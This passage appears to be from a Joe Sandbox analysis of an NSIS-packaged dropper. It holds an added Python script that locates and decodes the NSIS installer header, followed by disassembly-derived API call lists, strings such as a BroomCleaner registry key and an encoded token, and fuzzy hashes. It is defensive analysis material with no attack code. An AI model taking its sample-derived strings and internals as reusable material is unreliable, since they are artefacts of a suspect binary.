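real sample.

```python
"""Locate and decode the NSIS installer 'firstheader' record in a PE image.

Added triage example; not Joe Sandbox code and not code from the sample.
Record layout and constants follow NSIS Source/exehead/fileform.h
(struct firstheader, FH_SIG, FH_INT1..FH_INT3, FH_FLAGS_*).
"""
import struct
from typing import Optional

# Signature as it appears on disk: siginfo dword 0xDEADBEEF (little-endian)
# followed by the dwords "Null", "soft", "Inst".
NSIS_SIGNATURE = struct.pack("<I", 0xDEADBEEF) + b"NullsoftInst"

# firstheader.flags bits (FH_FLAGS_* in fileform.h).
FH_FLAGS_UNINSTALL = 0x1
FH_FLAGS_SILENT = 0x2
FH_FLAGS_NO_CRC = 0x4
FH_FLAGS_FORCE_CRC = 0x8

# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FIRSTHEADER_FMT = "<7I"
FIRSTHEADER_SIZE = struct.calcsize(FIRSTHEADER_FMT)  # 28 bytes


def find_nsis_firstheader(image: bytes) -> Optional[dict]:
    """Return the decoded firstheader if `image` carries NSIS installer data, else None.

    makensis appends the installer data block after the stub executable and the
    stub locates the record by scanning the file, so a plain byte scan for the
    16-byte signature is sufficient for triage.
    """
    pos = image.find(NSIS_SIGNATURE)
    while pos != -1:
        start = pos - 4  # the flags dword precedes siginfo
        if start >= 0 and start + FIRSTHEADER_SIZE <= len(image):
            flags, _sig, _n, _s, _i, header_len, data_len = struct.unpack_from(
                FIRSTHEADER_FMT, image, start)
            return {
                "offset": start,
                "flags": flags,
                "uninstaller": bool(flags & FH_FLAGS_UNINSTALL),
                "silent": bool(flags & FH_FLAGS_SILENT),
                "no_crc": bool(flags & FH_FLAGS_NO_CRC),
                "force_crc": bool(flags & FH_FLAGS_FORCE_CRC),
                "length_of_header": header_len,
                "length_of_all_following_data": data_len,
                # Declared data running past end-of-file means either a truncated
                # or carved sample, or a false hit on the signature bytes.
                "plausible": data_len <= len(image) - start,
            }
        pos = image.find(NSIS_SIGNATURE, pos + 1)
    return None


def stub_verifies_crc(flags: int, ncrc_switch: bool) -> bool:
    """Whether the NSIS stub CRC-checks the installer data.

    Assumption (my reading of the exehead CRC handling, to be verified against
    the NSIS source): /NCRC on the command line skips the check unless the
    installer was built with force_crc, and a no_crc installer carries no CRC.
    """
    if flags & FH_FLAGS_FORCE_CRC:
        return True
    if flags & FH_FLAGS_NO_CRC:
        return False
    return not ncrc_switch


def build_constructed_installer(flags: int, payload: bytes) -> bytes:
    """Constructed fixture, not a real sample: a dummy 512-byte stub image
    followed by a firstheader record and an opaque data block."""
    header_len = 0x100  # arbitrary value standing in for the compressed header size
    data_len = FIRSTHEADER_SIZE + len(payload)
    record = struct.pack(FIRSTHEADER_FMT, flags, 0xDEADBEEF,
                         0x6C6C754E, 0x74666F73, 0x74736E49,  # "Null" "soft" "Inst"
                         header_len, data_len)
    stub = b"MZ" + b"\x00" * 510  # stand-in for the exehead PE image
    return stub + record + payload


if __name__ == "__main__":
    sample = build_constructed_installer(FH_FLAGS_FORCE_CRC, b"\xAA" * 64)
    info = find_nsis_firstheader(sample)
    print(info)
    print("CRC still verified with /NCRC:", stub_verifies_crc(info["flags"], ncrc_switch=True))
```

On a real dropper, read the dumped PE (or the file on disk) into `image` and pass it to `find_nsis_firstheader`; a hit confirms the NSIS-packaged-dropper reading of the report, and the offset plus the two length fields tell you where the installer data block to carve and decompress begins and how large the stub expects it to be.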

                                                                                                                             Control-flow Graph
                                                                                                                             Function 004085B8 (basic blocks 004085B8 to 00408845). The graph, with its executed / not-executed colouring, is rendered as an image in the report; its block edge list is not reproduced here. Subroutines called: 00406FCB, 00407A46, 004078A4, 004078CE, 00407CB6, 00407CE8, 00407CF2, 00408123, 0040815B, 00408311, and 004085B8 itself (recursive call at 00408723 while walking subdirectories).
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32 ref: 004085D9
                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00408674
                                                                                                                            • FindFirstFileA.KERNEL32 ref: 00408694
                                                                                                                            • FindNextFileA.KERNELBASE(?,?,?,?,?,?,?,00000000,00000000), ref: 0040879C
                                                                                                                            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004087AF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextlstrlen
                                                                                                                            • String ID: ?$C:\Users\user\AppData\Local\Temp\nsiC1CE.tmp\*.*
                                                                                                                            • API String ID: 3200608346-608771194
                                                                                                                            • Opcode ID: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                            • Instruction ID: 15a94c35718d9934db7cd19974bec7e4185b96846047f3cacb9e12796964f464
                                                                                                                            • Opcode Fuzzy Hash: d81ed6c38f1aba44f588852f7cd5ef506992bc62bf75eddd0eb2d587c2438939
                                                                                                                            • Instruction Fuzzy Hash: 5E7175B0908344AED720AF25CE4576EBBF8AF45714F45887EE8C5A7381CB3D8844CB5A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                            • Instruction ID: 11fd5c66118aeed7f08c7c2f326ea88146cd1b5fc0ef80ef14f89fbd5f6a2284
                                                                                                                            • Opcode Fuzzy Hash: 7251eaddbbfde7681b746ec47e7261ccbbd10af8bddef417e70452c4b2653847
                                                                                                                            • Instruction Fuzzy Hash: 20E0ECB5704204AFD700BFB89C4841B7AE9AB94714B84C929B9A5CB390D634C85287AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                             Control-flow Graph
                                                                                                                             Function 004060FD (basic blocks 004060FD to 00406556). The graph, with its executed / not-executed colouring, is rendered as an image in the report; its block edge list is not reproduced here. Subroutines called: 00403903, 004049B4, 00404AE0, 00404C0D, 00407B3A, 00407BE3, 004078A4, 004078CE, 00407CB6, 00407CDE, 00407CE8, 00407CF2, 00407E06, 0040815B, 0040820E, 00408299.
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00408299: GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                              • Part of subcall function 00408299: GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                            • lstrcmpiA.KERNEL32 ref: 0040627B
                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 0040628A
                                                                                                                              • Part of subcall function 00407BE3: wsprintfA.USER32 ref: 00407BFE
                                                                                                                            • LoadImageA.USER32(?,?,00000000,00000000), ref: 00406317
                                                                                                                            • RegisterClassA.USER32 ref: 00406361
                                                                                                                            • SystemParametersInfoA.USER32 ref: 00406392
                                                                                                                            • CreateWindowExA.USER32 ref: 004063F7
                                                                                                                            • ShowWindow.USER32 ref: 0040643E
                                                                                                                            • GetClassInfoA.USER32(?,00000000), ref: 00406481
                                                                                                                            • GetClassInfoA.USER32 ref: 004064A1
                                                                                                                            • RegisterClassA.USER32 ref: 004064B7
                                                                                                                            • DialogBoxParamA.USER32 ref: 004064ED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                             • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcmpiwsprintf
• String ID: 8_o$_Nb$g
• API String ID: 3995538257-3066073381
• Opcode ID: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
• Instruction ID: 933614cd0025173359140365b9e7a590c615df7829bf1f80af9a09b402b61920
• Opcode Fuzzy Hash: 2f233f64265ed054fe4a50ef783cb1e0c7b699e5a95c035f069f719471a29138
• Instruction Fuzzy Hash: 75B10AB05083019FE710AF65D94872BBBE4EF44308F41892EE4D597391D7BC9895CB9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 00403F0F
• GetModuleFileNameA.KERNEL32 ref: 00403F36
  • Part of subcall function 00407A78: GetFileAttributesA.KERNEL32 ref: 00407A85
  • Part of subcall function 00407A78: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
  • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
  • Part of subcall function 004078CE: lstrlenA.KERNEL32 ref: 004078DB
  • Part of subcall function 004078CE: CharPrevA.USER32 ref: 004078F0
• GetFileSize.KERNEL32(00000000,00000000,75923160), ref: 00403FB5
  • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
• GlobalAlloc.KERNEL32 ref: 00404183
• CreateFileA.KERNEL32(00000000,00000000), ref: 004041DC
  • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
Strings
• Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error, xrefs: 00404168
• d`o, xrefs: 004042A0
• @, xrefs: 00404294
• Null, xrefs: 00404082
• Error writing temporary file. Make sure your temp folder is valid., xrefs: 004041EB
• soft, xrefs: 00404076
• Inst, xrefs: 00404066
• 8_o, xrefs: 00404266
• Error launching installer, xrefs: 00403F68
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: File$Create$AllocAttributesCharCountDestroyGlobalModuleNamePrevReadSizeTickWindowlstrcpynlstrlen
• String ID: 8_o$@$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$d`o$soft
• API String ID: 3119619987-3047085808
• Opcode ID: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
• Instruction ID: b38f96b7e78b57fcd3b2806388120572df800b880dbb1f433db2e5bcd9a6e09c
• Opcode Fuzzy Hash: 4fc0a7fd32f7e4debefb30af515cdd6f92a2255b0d2dd10cb1272751b383b930
• Instruction Fuzzy Hash: 1791A4B09083048FD720AF29D98576EBBF4EF84318F41847EE584A7291D77C9985CF9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CompareFileTime.KERNEL32(?,00000000), ref: 00401BA1
  • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
  • Part of subcall function 00407836: MessageBoxIndirectA.USER32 ref: 00407899
  • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
  • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Message$Send$CompareFileIndirectTextTimeWindowlstrcpyn
• String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$Installed$SOFTWARE\BroomCleaner
• API String ID: 645384303-3819460243
• Opcode ID: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
• Instruction ID: b5f2e25a14bd4d2b29e972ea4905dfdb01325226fa6e36a277c804736715cb88
• Opcode Fuzzy Hash: 79a18232532a1a7469df17609bd74b415ce06eee5835288b4c7b757715615148
• Instruction Fuzzy Hash: 71614FB09087009ED710BF65CA45A6FBAF8EF80714F018A2FF4C4A7291D77C58818B6B
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: File$Read$PointerWrite
• String ID: PB@
• API String ID: 2113905535-661560245
• Opcode ID: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
• Instruction ID: 6b6e275f29c4804299ca632934389f045b276b78e87a5faa28d99019ded5aa05
• Opcode Fuzzy Hash: c65ee0b9422e546ce60fc59843fb5b504002c352310d15ee9ec7ff5b6d871d70
• Instruction Fuzzy Hash: DC41FAB0A043059FDB10DF69C98479EBBF4FF84355F50893AE854A3290D378D9458B9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
• @es, xrefs: 0040290C
• 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa, xrefs: 00402914
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
Similarity
• API ID: Library$AddressFreeHandleLoadModuleProc
• String ID: 62lP/4uOUYfKA3tfxllnPzQXGLJgRjFKHZbIa8JtXF+oMlF4/GglqDQr8FrkYyAg2UYkxW9kefTa$@es
• API String ID: 1437655972-850321180
• Opcode ID: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
• Instruction ID: e70ddef41f08cbfaa68bc2c18546323f80d3119e0e26b2f1059722deacc19af5
• Opcode Fuzzy Hash: 1b6a0fabb82879a4a9aeeaa7f443e577fde00d5210071419eec9afd89e7f40fe
• Instruction Fuzzy Hash: E2318FB16083009FD7106F258D4876EBAE8BF84764F51893FE485A33D0D7B88886DB1A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 00403B7B
                                                                                                                              • Part of subcall function 00403B31: SetFilePointer.KERNEL32 ref: 00403B56
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00403BCB
                                                                                                                              • Part of subcall function 00403AE9: ReadFile.KERNEL32 ref: 00403B15
                                                                                                                            • WriteFile.KERNEL32 ref: 00403CB8
                                                                                                                            • SetFilePointer.KERNEL32 ref: 00403D2F
                                                                                                                              • Part of subcall function 004039FE: DestroyWindow.USER32 ref: 00403A17
                                                                                                                            Strings
Memory Dump Source
• Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
• Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Pointer$CountDestroyReadTickWindowWrite
                                                                                                                            • String ID: 8_o
                                                                                                                            • API String ID: 1725291646-890720360
Uniqueness Score: -1.00%
Control-flow Graph: interactive graph rendering omitted (legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                            • String ID: \$C@
                                                                                                                            • API String ID: 2200240437-1790911818
Uniqueness Score: -1.00%
Control-flow Graph: interactive graph rendering omitted (legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,004043E5), ref: 004082AE
                                                                                                                            • GetProcAddress.KERNEL32 ref: 004082DA
                                                                                                                              • Part of subcall function 0040820E: GetSystemDirectoryA.KERNEL32 ref: 00408229
                                                                                                                              • Part of subcall function 0040820E: wsprintfA.USER32 ref: 00408270
                                                                                                                              • Part of subcall function 0040820E: LoadLibraryExA.KERNEL32 ref: 00408289
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                            • String ID: UXTHEME$C@$C@
                                                                                                                            • API String ID: 2547128583-1808485004
Uniqueness Score: -1.00%
Control-flow Graph: interactive graph rendering omitted (legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                              • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                              • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
                                                                                                                              • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
                                                                                                                            • WaitForSingleObject.KERNEL32 ref: 00402661
                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 00402688
                                                                                                                              • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
                                                                                                                              • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
                                                                                                                            • CloseHandle.KERNEL32 ref: 004026C8
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3753073698-2564639436
Uniqueness Score: -1.00%
Control-flow Graph: interactive graph rendering omitted (legend: Executed / Not Executed)
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3449924974-0
                                                                                                                            • Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                            • Instruction ID: 0b729d7567636c09f29e4728680a85774f46e6e2b236e770b8bd2138b4be8b02
                                                                                                                            • Opcode Fuzzy Hash: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                            • Instruction Fuzzy Hash: 0B110CB1D04208DEDB109FA9D8447DEBFB4EF94354F10882AE944B7250D3796545CBAE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Rendered graph not preserved; summary of the edge list: entry block 408d43-408d4a; 81 basic blocks (numbered 579-659) spanning 408a9f-409b10; blocks that call APIs: 408b4d-408b63 GlobalFree, 408b69-408b90 GlobalAlloc, 408c45-408c54 GlobalFree, 408c55-408c76 GlobalAlloc.
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394109436-0
                                                                                                                            • Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                            • Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
